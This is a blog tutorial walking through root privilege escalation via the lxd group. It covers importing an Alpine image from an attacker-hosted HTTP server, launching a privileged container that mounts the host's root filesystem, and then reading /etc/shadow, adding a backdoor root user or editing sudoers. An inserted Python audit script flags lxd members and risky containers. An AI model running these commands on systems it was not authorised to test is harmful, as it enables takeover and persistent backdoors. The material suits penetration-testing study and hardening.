Linux Privilege Escalation with LXD Group?

Mr Jokar, published in System Weakness, Mar 14, 2023

Prerequisite:

If the low-privileged user we have a shell as is a member of the lxd group on the victim system, we can use this trick to escalate privileges to root.

Attack Overview:

Being a member of the lxd group means the user can manage containers on the system: the group grants the ability to create, start and control containers, which is why LXD's own documentation treats membership in this group as equivalent to root access. So what we do is download and build a Linux image on the victim machine. If the victim machine cannot reach the internet, we build the image on our attack machine instead and transfer it to the victim. Then we initialize and start a container from that image; since we created the container, we are root inside it. Next we mount the victim machine's root directory (“/”) into the container. Because we are the fully privileged root user in the container, we can browse the victim's real root filesystem and modify it. While doing that, we can even create a backdoor user with full root privileges on the victim machine and log in with it later.

STEP 1: Create and Build a Container Image and Transfer It to the Victim

Let’s git clone the repository of saghul/lxd-alpine-builder on the Attack Machine.

Then run ./build-alpine to build the image. When the process finishes, we get a .tar.gz image. If you hit errors while doing this (errors about the mirror file), check this open issue and follow its steps; that fixes the build and produces the image.

Now let's transfer the tar.gz file to the victim machine using Python's built-in HTTP server: run python3 -m http.server 80 on the attack machine to host it, then wget the file from the victim machine into a directory you can write to.

STEP 2: Initialize LXD and Import the Container Image

Now we run lxd init on the victim machine and press Enter at every prompt that pops up to accept the defaults; this initializes LXD. Then we import the image we just transferred from the attack machine with lxc image import ./image_name --alias privesc . This command imports the image and gives it an alias (a short name) so that we can refer to it easily. Running lxc image list confirms that it has been imported.

STEP 3: Create a Container from the Image and Get Root on It

Now that the image is imported, we create a container from it with lxc init <image_name> <container_name> -c security.privileged=true . The last part of the command is what lets us act as root not only inside the container but also on the victim machine's filesystem. Without security.privileged=true the container runs in a user namespace: we would still be root inside the container, but that root would be mapped to an unprivileged user id outside the container context, so we could not modify the host root filesystem or create a backdoor root user. So we run lxc init privesc privesc-container -c security.privileged=true and the container is created. We can confirm it with lxc list , which shows our container in the list.

STEP 4: Mount the Victim Machine's / Directory into the Container's /mnt

Now we mount the victim machine's whole filesystem (the / directory) into a directory of the container (/mnt for this walkthrough), so that as root inside the container we can browse the entire victim filesystem and do whatever we want with it.

lxc config device add privesc-container privdevice disk source=/ path=/mnt/root recursive=true . This command creates a “disk” type device named privdevice that mounts the victim machine's / directory at /mnt/root inside the container.

STEP 5: Start and Enter the Container

Run lxc start privesc-container to start the container and confirm it with lxc list . Then we enter the container with lxc exec privesc-container /bin/sh , which gives us an interactive sh shell. Running id shows that we are root.

STEP 6: Get into the Victim Machine's Filesystem and Conquer!

First navigate to /mnt/root, because that is where the victim machine's filesystem is mounted. Then be creative: you can read /etc/shadow to get the password hashes and crack them to become root, add a new user with the same privileges as root, or edit the sudoers file to grant full sudo rights to the user you already have access to. Whatever we change here is changed on the actual victim machine, and that is how we escalate privileges.
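An audit check for the two conditions this walkthrough relies on, added here as an example that is not part of the original post: it lists the members of the lxd group from /etc/group-style text and flags containers that are both security.privileged=true and carry a disk device sourced from a host path. It works on the JSON shape of lxc list --format json (field names assumed from the LXD instance API), and the sample data below is constructed.

```python
import json

# Constructed sample of /etc/group lines (not from a real host).
SAMPLE_GROUP_FILE = """root:x:0:
sudo:x:27:alice
lxd:x:999:bob,carol
"""

# Constructed sample shaped like `lxc list --format json` output.
# Field names (expanded_config/expanded_devices) are assumed from the
# LXD instance API; only the keys used below are included.
SAMPLE_LXC_LIST_JSON = json.dumps([
    {"name": "privesc-container",
     "expanded_config": {"security.privileged": "true"},
     "expanded_devices": {
         "privdevice": {"type": "disk", "source": "/", "path": "/mnt/root"},
         "root": {"type": "disk", "path": "/", "pool": "default"}}},
    {"name": "web",
     "expanded_config": {},
     "expanded_devices": {
         "root": {"type": "disk", "path": "/", "pool": "default"}}},
])


def lxd_group_members(group_file_text):
    """Return the user names listed as members of the lxd group."""
    for line in group_file_text.splitlines():
        fields = line.split(":")
        if len(fields) >= 4 and fields[0] == "lxd":
            return [u for u in fields[3].split(",") if u]
    return []


def risky_containers(lxc_list_json):
    """Return (name, [device: source -> path]) for containers that are
    privileged AND mount a host path (a pool-backed root disk has no source)."""
    findings = []
    for inst in json.loads(lxc_list_json):
        cfg = inst.get("expanded_config") or inst.get("config", {})
        devs = inst.get("expanded_devices") or inst.get("devices", {})
        privileged = cfg.get("security.privileged", "false").lower() == "true"
        host_mounts = [f"{n}: {d['source']} -> {d.get('path')}"
                       for n, d in devs.items()
                       if d.get("type") == "disk"
                       and str(d.get("source", "")).startswith("/")]
        if privileged and host_mounts:
            findings.append((inst["name"], host_mounts))
    return findings


if __name__ == "__main__":
    print("lxd group members:", lxd_group_members(SAMPLE_GROUP_FILE))
    for name, mounts in risky_containers(SAMPLE_LXC_LIST_JSON):
        print(f"privileged container with host mount: {name} {mounts}")
```

On a real host, feed it the contents of /etc/group and the output of lxc list --format json; any lxd member who is not an administrator, or any privileged container mounting a host path, is worth investigating.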

You got root. Get a good sleep now :3
